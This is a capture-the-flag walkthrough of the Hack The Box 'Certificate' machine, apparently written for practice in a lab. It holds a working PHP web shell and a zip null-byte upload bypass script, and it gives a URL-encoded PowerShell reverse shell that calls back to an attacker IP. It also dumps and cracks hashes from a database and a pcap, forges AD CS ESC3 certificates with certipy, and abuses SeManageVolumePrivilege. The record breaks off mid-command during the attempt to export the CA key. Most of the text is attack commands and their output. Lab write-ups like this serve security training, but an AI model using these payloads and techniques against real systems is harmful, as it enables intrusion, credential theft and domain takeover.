HTB | Certificate

machine - https://app.hackthebox.com/machines/Certificate

IP -10.129.238.3

NMAP

─$ nmap -sT -p- --min-rate 10000 10.129.238.3 -Pn -oA nmap_ports                                                                          
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-01 00:54 IST
Nmap scan report for 10.129.238.3
Host is up (0.31s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49686/tcp open  unknown
49688/tcp open  unknown
49706/tcp open  unknown
60728/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 98.69 seconds
	

└─$ nmap -sC -sV -p 53,80,88,135,139,445,464,636,3268,5985,9389,49666,49686,49688,49706,60728  10.129.238.3 -Pn -oA nmap_ports_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-01 00:56 IST
Nmap scan report for 10.129.238.3
Host is up (0.57s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-title: Did not follow redirect to <http://certificate.htb/>
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-01 03:27:07Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T03:28:50+00:00; +7h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T03:28:52+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49688/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
60728/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-01T03:28:14
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 115.48 seconds

SMB

The guest account is disabled, and junk accounts return STATUS_LOGON_FAILURE:

└─$ netexec smb 10.129.238.3 -u guest -p ''                                                                                           
SMB         10.129.238.3    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False) 
SMB         10.129.238.3    445    DC01             [-] certificate.htb\\guest: STATUS_ACCOUNT_DISABLED 

└─$ netexec smb 10.129.238.3 -u anurag -p '' 
SMB         10.129.238.3    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False) 
SMB         10.129.238.3    445    DC01             [-] certificate.htb\\anurag: STATUS_LOGON_FAILURE 
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Certificate]
└─$ netexec smb 10.129.238.3 -u anurag -p junk
SMB         10.129.238.3    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False) 
SMB         10.129.238.3    445    DC01             [-] certificate.htb\\anurag:junk STATUS_LOGON_FAILURE 

                                                                                                         

Port 80

└─$ whatweb -v -a 3 certificate.htb                    
WhatWeb report for <http://certificate.htb>
Status    : 200 OK
Title     : Certificate | Your portal for certification
IP        : 10.129.238.3
Country   : RESERVED, ZZ

Summary   : Apache[2.4.58], Bootstrap, Cookies[PHPSESSID], HTML5, HTTPServer[Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30], HttpOnly[PHPSESSID], JQuery[2.2.4], Meta-Author[colorlib], OpenSSL[3.1.3], PHP[8.0.30], Script[text/javascript], X-Powered-By[PHP/8.0.30]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 

        Version      : 2.4.58 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : <http://httpd.apache.org/>

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 

        Website     : <https://getbootstrap.com/>

[ Cookies ]
        Display the names of cookies in the HTTP headers. The 
        values are not returned to save on space. 

        String       : PHPSESSID

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        String       : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 (from server string)

[ HttpOnly ]
        If the HttpOnly flag is included in the HTTP set-cookie 
        response header and the browser supports it then the cookie 
        cannot be accessed through client side script - More Info: 
        <http://en.wikipedia.org/wiki/HTTP_cookie> 

        String       : PHPSESSID

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX. 

        Version      : 2.2.4
        Website     : <http://jquery.com/>

[ Meta-Author ]
        This plugin retrieves the author name from the meta name 
        tag - info: 
        <http://www.webmarketingnow.com/tips/meta-tags-uncovered.html>
        #author

        String       : colorlib

[ OpenSSL ]
        The OpenSSL Project is a collaborative effort to develop a 
        robust, commercial-grade, full-featured, and Open Source 
        toolkit implementing the Secure Sockets Layer (SSL v2/v3) 
        and Transport Layer Security (TLS v1) protocols as well as 
        a full-strength general purpose cryptography library. 

        Version      : 3.1.3
        Website     : <http://www.openssl.org/>

[ PHP ]
        PHP is a widely-used general-purpose scripting language 
        that is especially suited for Web development and can be 
        embedded into HTML. This plugin identifies PHP errors, 
        modules and versions and extracts the local file path and 
        username if present. 

        Version      : 8.0.30
        Version      : 8.0.30
        Google Dorks: (2)
        Website     : <http://www.php.net/>

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 

        String       : text/javascript

[ X-Powered-By ]
        X-Powered-By HTTP header 

        String       : PHP/8.0.30 (from x-powered-by string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Sun, 01 Jun 2025 03:29:17 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
        X-Powered-By: PHP/8.0.30
        Set-Cookie: PHPSESSID=mkj5ujfmpukvebmbctt27acscq; path=/; HttpOnly
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        Connection: close
        Transfer-Encoding: chunked
        Content-Type: text/html; charset=UTF-8

Let’ look for directory and subdirectory

└─$ dirsearch -u <http://certificate.htb/> -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                                                                              
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                              
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/anurag/htb/Certificate/reports/http_certificate.htb/__25-06-01_01-00-20.txt

Target: <http://certificate.htb/>

[01:00:20] Starting:                                                                                                                                                                                                                                                          
[01:00:54] 200 -   14KB - /about.php                                        
[01:01:36] 500 -  638B  - /cgi-bin/printenv.pl                              
[01:01:47] 200 -    0B  - /db.php                                           
[01:01:56] 503 -  404B  - /examples/jsp/index.html                          
[01:01:56] 503 -  404B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[01:01:56] 503 -  404B  - /examples/
[01:01:56] 503 -  404B  - /examples
[01:01:56] 503 -  404B  - /examples/servlet/SnoopServlet                    
[01:01:56] 503 -  404B  - /examples/jsp/snp/snoop.jsp                       
[01:01:56] 503 -  404B  - /examples/servlets/index.html
[01:01:56] 503 -  404B  - /examples/servlets/servlet/CookieExample
[01:01:56] 503 -  404B  - /examples/servlets/servlet/RequestHeaderExample
[01:01:56] 503 -  404B  - /examples/websocket/index.xhtml                   
[01:01:59] 200 -    3KB - /footer.php                                       
[01:02:03] 200 -    2KB - /header.php                                       
[01:02:16] 200 -    9KB - /login.php                                        
[01:02:17] 302 -    0B  - /logout.php  ->  login.php                        
[01:02:44] 200 -   11KB - /register.php                                     
[01:02:57] 301 -  343B  - /static  ->  <http://certificate.htb/static/>       
[01:02:57] 301 -  345B  - /static..  ->  <http://certificate.htb/static../>   
[01:03:08] 302 -    0B  - /upload.php  ->  login.php                        
                                                                             
Task Completed    

We can login as student

Foothold/shell

/uploads

We found “No quizz found with the given SID.” on /uploads

found upload functionality

Uploading a normal text file gives the following error

We can upload the PDF and view

When trying to upload and view a doc file, it gets downloaded

Since we can upload a zip file we can try to upload a shell.php with a null byte (maybe bypass?) inside a zip

I tried manually but no luck so we will below exploit.py

└─$ cat shell.php                 
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>

└─$ cat exploit.py 
import zipfile
import os

# Paths
zip_path = 'shell.zip'
new_zip_path = 'shell2.zip'
old_filename = 'shell.php'
new_filename = 'shell.php\\x00.pdf'

# Open the original ZIP and create a new one
with zipfile.ZipFile(zip_path, 'r') as zip_read:
    with zipfile.ZipFile(new_zip_path, 'w') as zip_write:
        for item in zip_read.infolist():
            original_data = zip_read.read(item.filename)
            # Rename the target file
            if item.filename == old_filename:
                item.filename = new_filename
            zip_write.writestr(item, original_data)

print(f'Renamed {old_filename} to {new_filename} inside {new_zip_path}')

└─$ zip shell.zip shell.php       
  adding: shell.php (deflated 25%)

└─$ python3 exploit.py
Renamed shell.php to shell.php.pdf inside shell2.zip

Now we will upload the shell2.zip and visit the file with /shell.php?cmd=whoami

and we can execute cmds

Let’s try to get revshell

<http://certificate.htb/static/uploads/8ad6b1453a685cd6a629959dcfb5039d/shell.php?cmd=powershell%20-NoP%20-NonI%20-W%20Hidden%20-Command%20%22$client%20%3D%20New-Object%20System.Net.Sockets.TCPClient('10.10.16.23'%2C1234)%3B$stream%20%3D%20$client.GetStream()%3B[byte[]>]$bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile(($i%20%3D%20$stream.Read($bytes%2C%200%2C%20$bytes.Length))%20-ne%200)%7B%3B$data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString($bytes%2C0%2C%20$i)%3B$sendback%20%3D%20(iex%20$data%202%3E%261%20%7C%20Out-String%20)%3B$sendback2%20%20%3D%20$sendback%20%2B%20'PS%20'%20%2B%20(pwd).Path%20%2B%20'%3E%20'%3B$sendbyte%20%3D%20([text.encoding]::ASCII).GetBytes($sendback2)%3B$stream.Write($sendbyte%2C0%2C$sendbyte.Length)%3B$stream.Flush()%7D%22

found password.txt

PS C:\\xampp> type passwords.txt
### XAMPP Default Passwords ###

1) MySQL (phpMyAdmin):

   User: root
   Password:
   (means no password!)

2) FileZilla FTP:

   [ You have to create a new user on the FileZilla Interface ] 

3) Mercury (not in the USB & lite version): 

   Postmaster: Postmaster (postmaster@localhost)
   Administrator: Admin (admin@localhost)

   User: newuser  
   Password: wampp 

4) WEBDAV: 

   User: xampp-dav-unsecure
   Password: ppmax2011
   Attention: WEBDAV is not active since XAMPP Version 1.7.4.
   For activation please comment out the httpd-dav.conf and
   following modules in the httpd.conf
   
   LoadModule dav_module modules/mod_dav.so
   LoadModule dav_fs_module modules/mod_dav_fs.so  
   
   Please do not forget to refresh the WEBDAV authentification (users and passwords).     
PS C:\\xampp> 

found webdav cred

PS C:\\xampp\\webdav> type webdav.txt
WEB-DAV f?r den gemeinsamen REMOTE-Zugriff
auf WWW-Dokumente ?ber den Apache2.

Die Module mod_dav.so und mod_dav_fs.so auskommentieren
URL: <http://localhost/webdav/>
User: wampp Password: xampp
E-Mail-Adresse bei Dreamweaver angeben. 
Lokales Directory: /xampp/webdav/
PS C:\\xampp\\webdav> 

DB

We found db.php

PS C:\\xampp\\htdocs\\certificate.htb> type db.php
<?php
// Database connection using PDO
try {
    $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
    $db_user = 'certificate_webapp_user'; // Change to your DB username
    $db_passwd = '<PASSWORD>'; // Change to your DB password
    $options = [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ];
    $pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
    die('Database connection failed: ' . $e->getMessage());
}
?>
PS C:\\xampp\\htdocs\\certificate.htb> 

Since we know we have xampp installed let's use mysql.exe in C:\\xampp\\mysql\\bin and let's take a look at the database

PS C:\\xampp\\mysql\\bin> ./mysql.exe --host=localhost --user=certificate_webapp_user --password="cert!f!c@teDBPWD" --database=Certificate_WEBAPP_DB -e "SELECT DATABASE();"
DATABASE()
certificate_webapp_db

PS C:\\xampp\\mysql\\bin> ./mysql.exe --host=localhost --user=certificate_webapp_user --password="cert!f!c@teDBPWD" --database=Certificate_WEBAPP_DB -e "SHOW TABLES;"
Tables_in_certificate_webapp_db
course_sessions
courses
users
users_courses
PS C:\\xampp\\mysql\\bin> 

We found hashes for users

PS C:\\xampp\\mysql\\bin> ./mysql.exe --host=localhost --user=certificate_webapp_user --password="cert!f!c@teDBPWD" --database=Certificate_WEBAPP_DB -e "SELECT * from users;"
id      first_name      last_name       username        email   password        created_at      role    is_active
1       Lorra   Armessa Lorra.AAA       lorra.aaa@certificate.htb       $2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG    2024-12-23 12:43:10     teacher 1
6       Sara    Laracrof        Sara1200        sara1200@gmail.com      $2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK    2024-12-23 12:47:11     teacher 1
7       John    Wood    Johney  johny009@mail.com       $2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq    2024-12-23 13:18:18     student 1
8       Havok   Watterson       havokww havokww@hotmail.com     $2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti    2024-12-24 09:08:04     teacher 1
9       Steven  Roman   stev    steven@yahoo.com        $2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2    2024-12-24 12:05:05     student 1
10      Sara    Brawn   sara.b  sara.b@certificate.htb  $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6    2024-12-25 21:31:26     admin   1
12      test    test    test    test@gmail.com  $2y$04$5r9/BJYyYLz3UoFUmxG1.ujjbWTcSVKE6Q/UvOQTJsBEt84C6HkZW    2025-06-01 07:00:09     student 1
PS C:\\xampp\\mysql\\bin> 

cracking password

Let's try and crack these passwords with hashcat.

└─$ hashcat -m 3200 hashes.txt /home/anurag/stuff/rockyou.txt --username

<--SNIP-->
$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6:Blink182
<--SNIP-->

Shell as Sara.b

and we are in sara.b

we found a pcap file

    Directory: C:\\Users\\Sara.B\\Documents\\WS-01

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        11/4/2024  12:44 AM            530 Description.txt
-a----        11/4/2024  12:45 AM         296660 WS-01_PktMon.pcap

*Evil-WinRM* PS C:\\Users\\Sara.B\\Documents\\WS-01> cat Description.txt
The workstation 01 is not able to open the "Reports" smb shared folder which is hosted on DC01.
When a user tries to input bad credentials, it returns bad credentials error.
But when a user provides valid credentials the file explorer freezes and then crashes!
*Evil-WinRM* PS C:\\Users\\Sara.B\\Documents\\WS-01> 

Shell as Lion.SK

WS-01_PktMon.pcap

On analysing protocols, we can see

Let’s look at Kerberos

We found a valid (maybe ?) packet

We can refer to this

In our case, the encryption mode (etype) is eTYPE-AES256-CTS-HMAC-SHA1-96 (18), which is the same as the vscrub

The cname and realm are in req-body: Lion.sk and CERTIFICATE.HTB, respectively.

We get the following hash

$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

We will use hashcat to crack the hash

└─$ hashcat lion.hash /home/anurag/stuff/rockyou.txt
<--SNIP-->

$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0:!QAZ2wsx

<--SNIP-->

Let’s winrm with the cred

and we are in

found user.txt

    Directory: C:\\Users\\Lion.SK\\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/1/2025   2:45 AM             34 user.txt

Privilege Escalation

Bloodhound

└─$ bloodhound-python -u Lion.SK -p '!QAZ2wsx' -d Certificate.htb -ns 10.129.93.221 -c All --zip

According to the description of Domain CRA Managers.

The members of this security group are responsible for issuing and revoking multiple certificates for the domain users

ESC3

Let’s look for vulnerable templates

└─$ certipy find -u Lion.SK -p '!QAZ2wsx' -target 10.129.93.221 -text -stdout -vulnerable                          
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 18 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'Certificate-LTD-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'Certificate-LTD-CA'
[*] Checking web enrollment for CA 'Certificate-LTD-CA' @ 'DC01.certificate.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : Certificate-LTD-CA
    DNS Name                            : DC01.certificate.htb
    Certificate Subject                 : CN=Certificate-LTD-CA, DC=certificate, DC=htb
    Certificate Serial Number           : 75B2F4BBF31F108945147B466131BDCA
    Certificate Validity Start          : 2024-11-03 22:55:09+00:00
    Certificate Validity End            : 2034-11-03 23:05:09+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CERTIFICATE.HTB\\Administrators
      Access Rights
        ManageCa                        : CERTIFICATE.HTB\\Administrators
                                          CERTIFICATE.HTB\\Domain Admins
                                          CERTIFICATE.HTB\\Enterprise Admins
        ManageCertificates              : CERTIFICATE.HTB\\Administrators
                                          CERTIFICATE.HTB\\Domain Admins
                                          CERTIFICATE.HTB\\Enterprise Admins
        Enroll                          : CERTIFICATE.HTB\\Authenticated Users
Certificate Templates
  0
    Template Name                       : Delegated-CRA
    Display Name                        : Delegated-CRA
    Certificate Authorities             : Certificate-LTD-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-05T19:52:09+00:00
    Template Last Modified              : 2024-11-05T19:52:10+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFICATE.HTB\\Domain CRA Managers
                                          CERTIFICATE.HTB\\Domain Admins
                                          CERTIFICATE.HTB\\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFICATE.HTB\\Administrator
        Full Control Principals         : CERTIFICATE.HTB\\Domain Admins
                                          CERTIFICATE.HTB\\Enterprise Admins
        Write Owner Principals          : CERTIFICATE.HTB\\Domain Admins
                                          CERTIFICATE.HTB\\Enterprise Admins
        Write Dacl Principals           : CERTIFICATE.HTB\\Domain Admins
                                          CERTIFICATE.HTB\\Enterprise Admins
        Write Property Enroll           : CERTIFICATE.HTB\\Domain Admins
                                          CERTIFICATE.HTB\\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFICATE.HTB\\Domain CRA Managers
    [!] Vulnerabilities
      ESC3                              : Template has Certificate Request Agent EKU set.
   

We can refer to this for ESC3

Shell as Ryan.K

Exploitation with Certipy

The exploitation process involves obtaining an Enrollment Agent certificate and then using it to request a certificate for a privileged user, which is then used for authentication.

• Step 1: Obtain an Enrollment Agent certificate. The attacker (lion.sk@certificate.htb) enrolls for a certificate from the misconfigured EnrollAgent template.

└─$ certipy req -u 'Lion.SK@certificate.htb' -p '!QAZ2wsx'  -dc-ip '10.129.93.221' -target 'dc01.certificate.htb' -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 21
[*] Successfully requested certificate
[*] Got certificate with UPN 'Lion.SK@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1115'
[*] Saving certificate and private key to 'lion.sk.pfx'
[*] Wrote certificate and private key to 'lion.sk.pfx'

Step 2: Use the Enrollment Agent certificate to request a certificate on behalf of the target user. The attacker uses their lion.sk.pfx (their agent certificate obtained in Step 1) to request a certificate from the SignedUser template (or another suitable agent-enrollable target template) on behalf of certificate\\ryan.k.

└─$ certipy req  -u 'Lion.SK@certificate.htb' -p '!QAZ2wsx'  -dc-ip '10.129.93.221' -target 'dc01.certificate.htb' -ca 'Certificate-LTD-CA' -template 'SignedUser'  -pfx lion.sk.pfx -on-behalf-of 'certificate\\ryan.k'        
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 23
[*] Successfully requested certificate
[*] Got certificate with UPN 'ryan.k@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Saving certificate and private key to 'ryan.k.pfx'
[*] Wrote certificate and private key to 'ryan.k.pfx'

Step 3: Authenticate using the "on-behalf-of" certificate. The attacker uses the ryan.k.pfx (obtained in Step 2) to authenticate as the ryan.

└─$ certipy auth -pfx ryan.k.pfx -dc-ip '10.129.93.221'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'ryan.k@certificate.htb'
[*]     Security Extension SID: 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Using principal: 'ryan.k@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ryan.k.ccache'
[*] Wrote credential cache to 'ryan.k.ccache'
[*] Trying to retrieve NT hash for 'ryan.k'
[*] Got hash for 'ryan.k@certificate.htb': aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6

Now we can winrm

And we are in as ryan

└─$ evil-winrm -i 10.129.93.221 -u ryan.k -H b1bc3d70e70f4f36b1509a65ae1a2ae6

Shell as Administrator

SeManageVolume

*Evil-WinRM* PS C:\\Users\\Ryan.K\\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State
============================= ================================ =======
SeMachineAccountPrivilege     Add workstations to domain       Enabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Enabled
*Evil-WinRM* PS C:\\Users\\Ryan.K\\Desktop> 

According to Microsoft, the SeManageVolumePrivilege is used for:

This policy setting determines which users can perform volume or disk management tasks, such as defragmenting an existing volume, creating or removing volumes, and running the Disk Cleanup tool.Use caution when assigning this user right. Users with this user right can explore disks and extend files in to memory that contains other data. When the extended files are opened, the user might be able to read and modify the acquired data.

Basically this privilege gives accesses to the disks.

I found the CsEnox exploit let’s download and copy it on the box nd exploit

Now I am able to view Administrator files

    Directory: C:\\Users\\Administrator\\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/1/2025  10:17 PM             34 root.txt

I can view, but I could not read the root.txt

Maybe a Drive-level filter is in place

Stored (”My”) certificate

We can view the "My" store (also known as the Personal certificate store) for the current user.

*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents> certutil -store my
my "Personal"
================ Certificate 0 ================
Archived!
Serial Number: 472cb6148184a9894f6d4d2587b1b165
Issuer: CN=certificate-DC01-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:30 PM
 NotAfter: 11/3/2029 3:40 PM
Subject: CN=certificate-DC01-CA, DC=certificate, DC=htb
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 82ad1e0c20a332c8d6adac3e5ea243204b85d3a7
  Key Container = certificate-DC01-CA
  Provider = Microsoft Software Key Storage Provider
Missing stored keyset

================ Certificate 1 ================
Serial Number: 5800000002ca70ea4e42f218a6000000000002
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 8:14 PM
 NotAfter: 11/3/2025 8:14 PM
Subject: CN=DC01.certificate.htb
Certificate Template Name (Certificate Type): DomainController
Non-root Certificate
Template: DomainController, Domain Controller
Cert Hash(sha1): 779a97b1d8e492b5bafebc02338845ffdff76ad2
  Key Container = 46f11b4056ad38609b08d1dea6880023_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Provider = Microsoft RSA SChannel Cryptographic Provider
Missing stored keyset

================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Provider = Microsoft Software Key Storage Provider
Missing stored keyset
CertUtil: -store command completed successfully.

Here we can see Certificate-LTD-CA

That is unusual because the "My" store is intended for end-entity certificates (your own certificates that usually have a private key).

We can use this Certificate-LTD-CA to get the certificate and hash for Administrator, and for that

• We need the export pfx of Certificate-LTD-CA

we are getting error , seems like we do not have private key (or we do not have access)

*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents> certutil -exportpfx my "75b2f4bbf31f108945147b466131bdca" ca_exported.pfx
my "Personal"
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Provider = Microsoft Software Key Storage Provider
Missing stored keyset
Enter new password for output file ca_exported.pfx:
Enter new password:
Confirm new password:
CertUtil: -exportPFX command FAILED: 0x80090016 (-2146893802 NTE_BAD_KEYSET)
CertUtil: Keyset does not exist

So we will need ./SeManageVolumeExploit.exe to give ryan permission to read the cert

*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents> ./SeManageVolumeExploit.exe
Entries changed: 836

DONE

*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents> certutil -key "Certificate-LTD-CA"
Microsoft Strong Cryptographic Provider:
